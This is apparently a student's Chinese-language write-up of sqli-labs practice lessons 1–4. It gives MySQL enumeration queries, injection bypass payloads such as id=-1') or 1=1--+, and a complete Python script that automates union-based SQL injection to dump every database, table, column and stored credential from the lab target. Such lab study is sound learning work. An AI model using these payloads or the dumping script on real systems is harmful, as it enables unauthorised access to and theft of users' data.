sqli-lab1~4

基础知识

常用函数:

version()		Mysql版本
user() 		数据库用户名
database() 	数据库名
@@datadir 	数据库安装路径
@@version_compile_os 	操作系统版本

常用查询语句:

  1. 查库
select schema_name from information_schema.schemata
  1. 查表
select table_name from information_schema.tables where table_schema='security' 
-- 该表名用的时候大多转为*16*进制
  1. 查列
select column_name from information_schema.columns where table_name='users'
  1. 查字段
select username,password from security.users
  1. 查询结果按第n列排序 (用于报错注入测试有几列)
order by (n)

sql注释符:

  1. #
    
  2. --+
    
  3. --
    

字符串连接函数

  1. concat (str1 , str2)    -- 连接字符串, 无分隔符
    
  2. concat (-/~ , str1 , str2)    -- 连接字符串, 有分隔符
    
  3. group_concat (str1 , str2)    -- 连接字符串, 并用 ',' 分隔每一个字符
    

字符型 数字型 搜索型 注入的区别判断

(如题)



study 1:

​ 首先用id=1'发现报错, 再用id=1' or '1'='1发现成功注入, 判断为字符型注入

​ 写了个脚本, 一把梭

# coding=utf-8

import requests
from urllib import parse
import sys
from bs4 import BeautifulSoup

url = "http://www.sqlstudy.com/sqlstudy/Less-1"

def CheckStatus(r_text):
    if "Login name" in r_text:
        return 1
    else:
        return 0

def PrintNameAndPswd(res_text):
    pos_name = res_text.index("Your Login name:")
    pos_name_move = pos_name
    pos_pswd = res_text.index("Your Password:", pos_name)
    pos_pswd_move = pos_pswd
    str_name = ''
    str_pswd = ''
    while res_text[pos_name_move] != '<':
        pos_name_move += 1
    str_name = res_text[pos_name : pos_name_move]
    while res_text[pos_pswd_move] != '<':
        pos_pswd_move += 1
    str_pswd = res_text[pos_pswd : pos_pswd_move]
    # print (str_name + '\n' + str_pswd)
    return str_name


def GetColumnsNum():
    left = 1
    right = 20
    mid = (left + right) // 2
    while left <= right:
        payload = "id=1' order by {}--+".format(mid)
        res = requests.get(url = url , params = payload)
        # print(parse.unquote(res.url))
        res_text = res.text
        if CheckStatus(res_text):
            # PrintNameAndPswd(res_text , pos_name , pos_pswd)
            left = mid + 1
        else:
            right = mid - 1
        mid = (right + left) // 2

    return mid

def HowItContrl(columnsnum):
    # Your Login name:2
    # Your Password:3
    payload = "id=-1' union select "
    for i in range(1 , columnsnum + 1):
        payload = payload + "{},".format(i)
    res = requests.get(url=url , params=payload.strip(",") + '--+')
    res_text = res.text
    if CheckStatus(res_text):
        PrintNameAndPswd(res_text)

def GetAllDatabase():
    payload = "id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+"
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        return PrintNameAndPswd(res_text)

def WhereAmI():
    payload = "id=-1' union select 1,database(),3 --+"
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        MyPosition = PrintNameAndPswd(res_text)
        return MyPosition[MyPosition.index(":") + 1 : ]

def GetTableName(DatabaseName):
    payload = "id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=\"{}\"--+".format(DatabaseName)
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        TableName = PrintNameAndPswd(res_text)
        TableName = TableName[TableName.index(":") + 1 :].split(",")
        return TableName

def GetColumnName(TableName):
    payload = "id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='{}' --+".format(TableName)
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        ColumnName = PrintNameAndPswd(res_text)
        ColumnName = ColumnName[ColumnName.index(":") + 1 :].split(",")
        return ColumnName

def GetDetails(DatabaseName , TableName , ColumnName):
    payload = "id=-1' union select 1,group_concat({}),3 from {}.{} --+".format(ColumnName , DatabaseName , TableName)
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        Details = PrintNameAndPswd(res_text)
        Details = Details[Details.index(":") + 1 :].split(",")
        return Details

if __name__ == "__main__" :
    with open('sqli-lab1.txt' , 'w') as f:
        columnsnum = GetColumnsNum()
        f.write("column_number = " + str(columnsnum) + '\n')
        # HowItContrl(columnsnum)
        DatabaseName = GetAllDatabase()
        DatabaseName = DatabaseName[DatabaseName.index(":") + 1:].split(",")
        MyPosition = WhereAmI()
        f.write("You are in : " + MyPosition + '\n')
        for i in range(0,len(DatabaseName)):
            f.write("DatabaseName : " + DatabaseName[i] + '\n')
            TableName = []
            TableName = GetTableName(DatabaseName[i])
            # print(TableName)
            for j in range(0,len(TableName)):
                f.write("--TableName : " + TableName[j] + '\n')
                ColumnName = []
                ColumnName = GetColumnName(TableName[j])
                # print(ColumnName)
                for k in range(0, len(ColumnName)):
                    f.write("----ColumnName : " + ColumnName[k] + '\n')
                    Details = []
                    Details = GetDetails(DatabaseName[i] , TableName[j] , ColumnName[k])
                    # print(type(Details))
                    Details_type = str(type(Details))
                    if not "NoneType" in Details_type:
                        for l in range(0,len(Details)):
                            f.write("------Details : " + Details[l] + '\n')
                            if l == len(Details) - 1:
                                f.write("\n---------------------------------------------------------------\n\n")
                    else:
                        f.write("--------Details : NULL \n")

study 2:

​ 发现是数字型, 用id=-1 or 1=1--+就能绕过, 然后脚本改改也能一把梭

study 3:

​ 使用id=1'之后发现报错, 结合错误语句看出是('id'), 用id=-1') or 1=1--+就能绕过, 然后改脚本一把梭

study 4:

id=1'没报错, 换成id=1"报错, 结合语句判断出是("id"), 用id=-1") or 1=1--+即可绕过, 改脚本梭哈

上一篇:Airtest IDE 自动化测试14 - 如何让 Airtest 启动指定包名(start_app)


下一篇:Simple-db-lab1